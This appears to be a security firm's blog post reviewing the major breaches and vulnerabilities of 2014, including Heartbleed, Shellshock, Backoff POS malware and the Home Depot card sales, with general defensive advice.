While many are looking ahead at 2015, with both relief and some anxiety, we believe its worth taking a look back at the biggest security and fraud stories of 2014, to serve as a reminder of how the fraud landscape has evolved over the last twelve months and what you should be doing to protect your business when, not if, the next security event happens.
Issued on January 2 of 2014, this foreshadowed the months ahead. The U.S. Computer Emergency Readiness Team (US-CERT) put out an alert (https://www.us-cert.gov/ncas/alerts/TA14-002A) on malware targeting Point of Sale (POS) systems, which retailers use to process transactions from consumers. While POS targeting is nothing new, the threat had clearly escalated to a level that US-CERT felt it impactful enough to issue an alert. And while they offered up best practices for POS system owners to protect themselves and their customers from unauthorized access to their systems, they also recognized that no system is impenetrable. However, by proactively monitoring for indicators of compromise, institutions can take additional steps to shutdown threats before they result in system wide compromise.
Continuing on in the busy month of January, on January 4th, we saw a dump of two million cards onto the black market – one of the largest single day drops we had seen in a while. At the time we could not definitively say what was the source of the breach, but the percentage of Extremely High Value cards was significantly higher than what we had seen on average. This was later confirmed as the Neiman Marcus breach.
- Heartbleed – Hackers Posting Massive Lists of Vulnerable Domains; Huge Account Takeovers Likely Over Time
Definitely one of the biggest security breach stories of 2014 was Heartbleed. Through the course of our own monitoring, we noticed some interesting activity related to the new SSL “Heartbleed” (link: http://heartbleed.com/) vulnerability. Hackers were posting huge lists of 10,000+ domains that had been run through the automated web-based Heartbleed vulnerability checking tools. This list described if the web sites were vulnerable, patched, or if SSL was not present. Since we still live in a world filled with single-factor authentication and an over-reliance on out-of-wallet questions, we predicted an increase in account takeover attacks by simply pulling credentials from the memory of vulnerable servers and automatically testing them against other sites. Our advice: Don’t be penny wise and pound foolish. Patch your systems and replace your certs. Vulnerabilities are provable in the moment, but exploitability generally increases over time.
On April 25, our research team confirmed that a massive spam campaign leveraging ZeuS GameOver, was also targeting major banks, social networks, and other enterprises. Hundreds of unsolicited emails, impersonating “Broad Oak Toiletries Ltd”, were targeting these organizations. Upon opening, the file attempted to download a binary form of 55 different URLs. Following this, approximately 35 websites would serve up the payload of ZeuS GameOver, with the Narcus rootkit and some ransomware. Unfortunately, there was little to nothing organizations could do to prevent attacks from happening, since the spread of the attack would be out of their control. In events like this, organizations benefit from services that monitor the black markets, to determine quickly if they are an active target and reduce the effective time and losses from an attack.
In late May, we were greeted with news of a new banking trojan malware variant named Zberb. This malware variant terrified many as Zberb was designed and built by combining features already in the wild from two major bank trojan families, Zeus/Zbot and Carberb. Both of these trojans have been in the wild for a long time and have been consistently improved with new attack vectors, new detection mitigations and new communications mechanisms. Anti-fraud is a battle of inches and it’s an exercise in constant self-examination and criticism. A well-designed anti-fraud program that is designed to model multi-channel risk and the current and future effectiveness of overlapping controls is the best approach to making sure that Zeus, SpyEye, Catberb and Zberb are nothing more than a “berb” and seen as one constant, yet controllable risk.
Restaurant chain P.F. Chang’s China Bistro announced August 4 that a breach of its card processing system, originally reported June 12, may have resulted in the theft of customer payment card information at 33 of its 2010 U.S. locations. The security compromise was part of a highly sophisticated criminal operation that was being investigated by both the U.S. Secret Service and a third-party. Many speculated that this breach was related to Target but we didn’t think so as there are many people capable of performing these types of attacks.
In what had become an unusually active August, the US-CERT issued an updated advisory, warning that the ‘Backoff’ Point-of-Sale malware was continuing to evolve. Following that announcement, UPS confirmed that it was the newest likely victim of Backoff. At this point, the US-CERT had now seen five variants of ‘Backoff’, each with notable modifications, and the malware has been found in at least three separate forensic investigations. They noted that the variants were largely undetected by AV vendors, and recommend that in lieu of such protection, organizations should monitor for ‘indicators of compromise’ (IOCs) to determine if they have been infected. As criminals have gained greater success in exploiting these systems (at Target, Niemen Marcus, Michaels, etc), they will continue to invest significant ‘R&D’ resources into creating not just new variants of existing POS malware, but entire new families that can remain undetected for longer periods of time. The real key here is to have a layered approach, which will make the cost of stealing credit card information much higher and much more difficult for criminals, and will identify IOCs faster and more effectively.
- Home Depot Breach: Time to Value of Black Market Cards Changes as Banks and Retailers Improve Detection
In September, the latest retailer to be breached was Home Depot, and this turned our attention back to credit card black markets, the clearinghouses that sell these stolen cards to the highest bidder. It appeared that these new batch of cards were selling for $50-100 each, though those prices quickly came down faster than in the past, as the window of opportunity to profit from stolen cards had shrunk because financial institutions had become smarter about dealing with these attacks. The good news here is that banks and retailers were becoming faster to respond, and were improving their detection methods, thereby shortening the window of opportunity for these criminals, and reducing the exposure and hassle to consumers.
- Shellshock – BASH Exploitation Likely to Affect Large Hosting Providers and Sites, Be Used to Create Botnets
Also considered among the top security stories of the year, was the Bash vulnerability. This one wasn’t one of those insane memory corruption vulnerabilities, rather it was a marvel of elegance and simplicity. To make matters worse, this bug resembled the recent Heartbleed vulnerability in that people were aggressively scanning the entire Internet for it with their massively parallel scanning tools. These tools could scan the entire ipv4 IP space really quickly and report back exactly who and what was vulnerable. In other words, the criminals were already capitalizing on this to build these networks of hacked machines (botnets). In this case we recommended that everyone should watch their logs carefully—this exploit was noisy and easily logged – and patch as soon as possible. In addition, given the risk that the patches may not be effective, organizations should consider monitoring to ensure their devices are not being used to host phishing or other attacks.
We hope you enjoyed our little tour down hacker memory lane. The goal is for it to have served as a helpful reminder of how hackers are working their way into systems and what you can do to shutdown threats before they result in system-wide compromise, and reduce the losses from an attack.